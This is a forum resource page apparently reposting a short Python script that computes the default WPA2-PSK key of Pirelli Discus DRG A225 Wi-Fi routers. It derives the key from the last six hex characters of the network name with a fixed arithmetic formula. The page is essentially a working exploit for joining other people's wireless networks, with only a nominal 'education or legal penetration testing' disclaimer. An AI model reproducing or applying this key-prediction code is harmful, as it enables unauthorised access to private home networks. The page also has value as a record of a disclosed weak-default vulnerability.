Pirelli Discuss DRG A225 Exploit 1.0

Pirelli Discus DRG A225 wifi router WPA2PSK default algorithm exploit

This resource is being watched by 17 members.
  1. Mr. Penguin
    Authored by j0rgan | Site jorgan.users.cg.yu

    Select All
    #!/usr/bin/python # # Pirelli Discus DRG A225 WiFi router # Default WPA2-PSK algorithm vulnerability # # paper: http://milw0rm.com/papers/313 # # With this code we can predict the WPA2-PSK key... # # Hacked up by Muris Kurgas aka j0rgan # j0rgan (-@-) remote-exploit.org # http://www.remote-exploit.org # # Use for education or legal penetration testing purposes..... # import sys def hex2dec(s): return int(s, 16) if len(sys.argv) < 2 or len(sys.argv[1]) != 6: print "\r\nEnter the last 6 chars from Discus SSID" print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n" exit() const = hex2dec('D0EC31') inp = hex2dec(sys.argv[1]) result = (inp - const)/4 print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.

    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K